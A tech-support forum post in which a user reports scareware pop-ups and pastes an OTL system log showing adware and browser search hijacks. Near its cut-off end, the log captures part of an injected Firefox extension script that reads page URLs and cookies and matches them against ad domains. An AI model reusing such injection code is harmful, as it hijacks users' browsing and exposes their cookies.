Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

POP UPS [Solved]


  • This topic is locked This topic is locked

#1
RUSTY2

RUSTY2

    Member

  • Member
  • PipPipPip
  • 221 posts

gitting a lot of pop ups evan posting this on your site got different melware software wanting me to purchase there antimelware

   here is my log hopfully you great guys can help thank you in advance

 

OTL logfile created on: 25/12/2014 9:28:51 PM - Run 7
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\BR\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy
 
6.97 Gb Total Physical Memory | 4.01 Gb Available Physical Memory | 57.55% Memory free
13.93 Gb Paging File | 11.25 Gb Available in Paging File | 80.73% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 920.39 Gb Total Space | 752.42 Gb Free Space | 81.75% Space Free | Partition Type: NTFS
Drive D: | 11.02 Gb Total Space | 1.59 Gb Free Space | 14.44% Space Free | Partition Type: NTFS
Drive F: | 7.45 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: UDF
Drive K: | 2794.49 Gb Total Space | 2794.03 Gb Free Space | 99.98% Space Free | Partition Type: NTFS
 
Computer Name: BRIAN-PC | User Name: BR | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/12/24 16:13:48 | 000,678,968 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\hitsblender.exe
PRC - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/12/11 11:36:04 | 000,089,864 | ---- | M] (Hewlett-Packard Company) -- C:\Program Files (x86)\hp\Common\HPSupportSolutionsFrameworkService.exe
PRC - [2014/12/09 09:15:02 | 000,337,520 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/10/29 23:25:46 | 004,673,432 | ---- | M] (Akamai Technologies, Inc.) -- C:\Users\BR\AppData\Local\Akamai\netsession_win.exe
PRC - [2014/10/20 17:52:12 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
PRC - [2014/10/17 15:24:20 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
PRC - [2014/10/17 15:24:04 | 000,043,816 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
PRC - [2014/10/11 13:05:40 | 000,060,712 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
PRC - [2014/10/01 02:17:20 | 002,694,320 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
PRC - [2014/09/28 20:56:44 | 000,490,160 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
PRC - [2014/09/26 14:40:46 | 006,237,856 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
PRC - [2014/09/19 20:16:28 | 001,038,504 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
PRC - [2014/09/10 12:37:16 | 000,769,696 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
PRC - [2014/08/26 17:50:56 | 002,087,776 | ---- | M] (Wondershare) -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
PRC - [2014/07/22 14:25:38 | 001,042,808 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe
PRC - [2014/07/22 14:15:46 | 005,562,736 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe
PRC - [2014/05/23 11:09:00 | 000,296,312 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
PRC - [2014/05/23 11:06:20 | 001,852,264 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Utilities\WDDriveUtilitiesHelper.exe
PRC - [2014/05/03 08:33:19 | 001,864,368 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_206.exe
PRC - [2014/01/23 21:05:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\BR\Downloads\OTL(2).exe
PRC - [2013/09/25 05:37:14 | 000,181,152 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe
PRC - [2013/06/18 21:21:20 | 001,694,080 | R--- | M] (Western Digital Technologies, Inc.) -- C:\Program Files (x86)\Western Digital\WD Security\WDDriveAutoUnlock.exe
PRC - [2009/10/22 18:50:40 | 000,210,216 | ---- | M] (CyberLink) -- c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/12/24 16:13:49 | 000,874,496 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\platforms\qwindows.dll
MOD - [2014/12/24 16:13:48 | 000,725,504 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libGLESv2.dll
MOD - [2014/12/24 16:13:48 | 000,678,968 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\hitsblender.exe
MOD - [2014/12/24 16:13:48 | 000,241,152 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qjpeg.dll
MOD - [2014/12/24 16:13:48 | 000,220,672 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qmng.dll
MOD - [2014/12/24 16:13:48 | 000,143,872 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libmpg123.dll
MOD - [2014/12/24 16:13:48 | 000,042,496 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\libEGL.dll
MOD - [2014/12/24 16:13:48 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qico.dll
MOD - [2014/12/24 16:13:48 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\HitsBlender\imageformats\qgif.dll
MOD - [2014/12/09 09:15:00 | 003,758,192 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/10/16 02:19:23 | 007,668,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll
MOD - [2014/10/16 02:19:22 | 002,822,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f9f13cd8fe1cefaad78579a7c3a41464\System.Runtime.Serialization.ni.dll
MOD - [2014/10/16 02:19:21 | 000,122,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\046058f81b039ab6fd839e03e67595f8\SMDiagnostics.ni.dll
MOD - [2014/10/16 02:19:20 | 000,794,112 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\35d3a1b878542de59cb4fc0593992404\System.ServiceModel.Internals.ni.dll
MOD - [2014/10/16 02:19:19 | 000,976,384 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll
MOD - [2014/10/16 02:19:17 | 010,100,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll
MOD - [2014/10/11 13:06:16 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/10/11 13:05:58 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/09/28 21:01:38 | 036,730,032 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libcef.dll
MOD - [2014/09/28 21:01:38 | 000,746,160 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libGLESv2.dll
MOD - [2014/09/28 21:01:38 | 000,136,368 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libEGL.dll
MOD - [2014/09/26 14:40:46 | 006,237,856 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
MOD - [2014/08/26 17:47:08 | 001,491,968 | ---- | M] () -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
MOD - [2014/05/19 17:19:02 | 000,137,728 | ---- | M] () -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
MOD - [2014/05/03 08:33:17 | 016,351,920 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll
MOD - [2014/02/27 03:03:52 | 016,953,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
MOD - [2009/10/22 18:50:38 | 000,931,112 | ---- | M] () -- c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 18:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/05/26 21:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/06/07 17:30:20 | 001,431,888 | ---- | M] (Flexera Software, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe -- (FLEXnet Licensing Service 64)
SRV:64bit: - [2011/01/08 07:17:46 | 000,087,336 | ---- | M] (Dassault Systèmes SolidWorks Corp.) [Disabled | Stopped] -- C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe -- (CoordinatorServiceHost)
SRV:64bit: - [2010/09/22 17:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/12/11 11:36:04 | 000,089,864 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\hp\Common\HPSupportSolutionsFrameworkService.exe -- (HPSupportSolutionsFrameworkService)
SRV - [2014/12/09 09:15:01 | 000,114,800 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/07/22 14:25:38 | 001,042,808 | R--- | M] (Western Digital Technologies, Inc.) [Auto | Running] -- C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe -- (WDBackup)
SRV - [2014/05/23 11:09:00 | 000,296,312 | R--- | M] (Western Digital Technologies, Inc.) [Auto | Running] -- C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe -- (WDDriveService)
SRV - [2014/05/03 08:33:19 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/03/20 14:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/25 05:37:14 | 000,181,152 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe -- (AdobeActiveFileMonitor12.0)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/07/05 17:41:46 | 003,048,136 | ---- | M] (Skype Technologies S.A.) [Disabled | Stopped] -- C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe -- (Skype C2C Service)
SRV - [2012/06/07 13:15:17 | 001,044,816 | ---- | M] (Flexera Software, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/06/07 13:07:25 | 000,079,360 | ---- | M] (SolidWorks) [Disabled | Stopped] -- C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe -- (SolidWorks Licensing Service)
SRV - [2010/12/08 17:23:10 | 000,136,568 | ---- | M] (iAnywhere Solutions, Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\SQL Anywhere 10\win32\dbsrv10.exe -- (SQLANYs_SmpParts)
SRV - [2010/10/22 12:08:18 | 001,039,360 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\hp\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)
SRV - [2010/07/01 09:38:26 | 000,083,512 | ---- | M] (ArcSoft, Inc.) [Disabled | Stopped] -- C:\Users\BRIAN\AppData\Roaming\HP SimpleSave Application\uUACTokenSvc.exe -- (BackupService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/08/15 23:35:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2014/07/18 15:19:56 | 000,107,368 | ---- | M] (LogMeIn, Inc.) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\LMIRfsClientNP.dll -- (LMIRfsClientNP)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2013/07/19 02:01:00 | 000,056,336 | ---- | M] (Corel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:64bit: - [2013/05/13 14:36:06 | 000,050,864 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\point64.sys -- (Point64)
DRV:64bit: - [2013/05/13 14:36:06 | 000,029,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nuidfltr.sys -- (NuidFltr)
DRV:64bit: - [2013/03/25 13:41:46 | 000,076,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dc3d.sys -- (dc3d)
DRV:64bit: - [2012/12/10 14:48:02 | 000,044,544 | ---- | M] (Research in Motion Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RimSerial_AMD64.sys -- (RimVSerPort)
DRV:64bit: - [2012/10/03 16:14:56 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/08/23 06:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012/08/23 06:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012/06/20 08:42:44 | 003,678,720 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2012/03/08 17:40:52 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2012/02/29 22:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/09/16 13:10:50 | 000,072,216 | ---- | M] (LogMeIn, Inc.) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\LMIRfsDriver.sys -- (LMIRfsDriver)
DRV:64bit: - [2011/09/16 13:10:24 | 000,011,552 | ---- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\lmimirr.sys -- (lmimirr)
DRV:64bit: - [2011/05/27 06:05:08 | 000,063,528 | ---- | M] (SafeNet, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SNTUSB64.SYS -- (SNTUSB64)
DRV:64bit: - [2010/11/20 05:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/10/16 04:28:42 | 010,619,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2009/09/17 06:05:02 | 000,145,448 | ---- | M] (SafeNet, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\sentinel64.sys -- (Sentinel64)
DRV:64bit: - [2009/09/17 04:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/08/20 16:05:06 | 000,239,616 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/08/03 09:56:39 | 000,408,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2009/08/03 09:56:37 | 000,237,936 | ---- | M] (Advanced Micro Devices, Inc) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\ahcix64s.sys -- (ahcix64s)
DRV:64bit: - [2009/08/03 09:55:37 | 000,067,128 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2009/08/03 09:55:37 | 000,028,216 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2009/07/13 17:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 17:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 17:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 16:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/07/13 16:10:47 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rootmdm.sys -- (ROOTMODEM)
DRV:64bit: - [2009/06/10 12:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 12:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 12:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 12:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008/05/06 15:06:00 | 000,014,464 | ---- | M] (Western Digital Technologies) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\wdcsam64.sys -- (WDC_SAM)
DRV - [2009/07/13 17:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page =
IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE:64bit: - HKLM\..\SearchScopes\{07C7C110-7846-4522-8DA7-7316F05F3171}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co...=1701220253&ir=
IE:64bit: - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...=MSSEDF&pc=MSSE
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-CA
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = E7 B6 09 7D 43 A3 CE 01  [binary data]
IE - HKCU\..\SearchScopes,DefaultScope = {07C7C110-7846-4522-8DA7-7316F05F3171}
IE - HKCU\..\SearchScopes\{07C7C110-7846-4522-8DA7-7316F05F3171}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKCU\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co...=1701220253&ir=
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKCU\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>;*.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.defaulturl: ""
FF - prefs.js..browser.search.isUS: true
FF - prefs.js..browser.search.order.1: "default-search.net"
FF - prefs.js..browser.search.order.3: "Bing "
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.VRP76tdH9kf0F4HH.scode: "try{(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadse